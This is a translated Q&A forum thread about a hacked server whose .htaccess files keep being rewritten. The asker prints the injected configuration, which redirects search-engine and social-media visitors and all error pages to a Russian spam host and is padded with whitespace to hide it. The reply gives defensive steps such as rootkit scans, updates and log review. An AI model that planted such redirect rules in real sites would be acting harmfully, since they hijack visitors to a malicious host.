Script mal-intencionado alterando os arquivos .htaccess no servidor [duplicado]

Navegue suas respostas
1

Parece haver um script mal-intencionado acessando meu servidor e editando os arquivos .htaccess de todos os meus sites hospedados para redirecionar para links de spam.

Qual é a melhor maneira de impedir que isso aconteça?

Alterei os detalhes de acesso do meu servidor, tanto para o painel de controle quanto para o acesso ao FTP, e tentei atualizar os arquivos .htaccess existentes com o código a seguir, mas ainda parece estar mudando. 

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>

# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Existe mais alguma coisa que possa ajudar?

Desculpe por qualquer falta de informação, eu sou razoavelmente novo em relação aos servidores etc, então se houver algum detalhe extra necessário, apenas grite!

Agradecemos antecipadamente por qualquer ajuda.

Dan

******* EDIT *******

O .htaccess malicioso, conforme solicitado 

<IfModule mod_rewrite.c>    
                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
                                                                                                RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
                                                                                                    RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                </IfModule>

    # STRONG HTACCESS PROTECTION</code>
    <Files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </Files>
    # protect from sql injection
    Options +FollowSymLinks
    RewriteEngine On
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    RewriteRule ^(.*)$ index.php [F,L]                                                                                                                                                                                                                                          
                                                                                                                            ErrorDocument 400 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 401 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 403 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 404 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 500 http://byidelement.ru/ruby/index.php
    
por DanC 08.01.2012 / 12:27

1 resposta

2

Execute chkrootkit um pouco rápido, por precaução.

Verifique se todos os pacotes estão atualizados com correções de segurança:

  • Ubuntu / Debian: apt-get update; apt-get dist-upgrade
  • CentOS / Fedora / RHEL: yum upgrade

No entanto, é provável que este seja um exploit conhecido na versão do Wordpress (ou alguma outra estrutura padrão) que você está executando e agora está sendo descoberto que está sendo explorado remotamente de novo e de novo. Se esse for o caso, pesquise a versão mais recente de todas as estruturas que você está executando e verifique se há correções de segurança.

Supondo que ele tenha sido explorado remotamente, isso pode ser confirmado obtendo um tail em execução no (s) registro (s) de acesso ao servidor Web e observando qualquer atividade suspeita. tail -f /var/log/apache2/access-log seria o comando em uma instalação padrão do Ubuntu, mas todas as distros colocam seus logs do Apache em lugares diferentes. Quando você vir algo suspeito, saberá qual VirtualHost foi comprometido. Se você estiver se sentindo aventureiro, examine também os registros de acesso históricos. Isso pode ser assustador em um servidor de alto tráfego, mas mostrará o ponto de ataque. Limite a sua pesquisa, pesquisando quando você sabe que o primeiro ataque ocorreu.

    
por 08.01.2012 / 13:08

Tags

Posso mover um LUN de um servidor fsico para o cliente VM? Javascript funciona em qualquer outro lugar, exceto novo servidor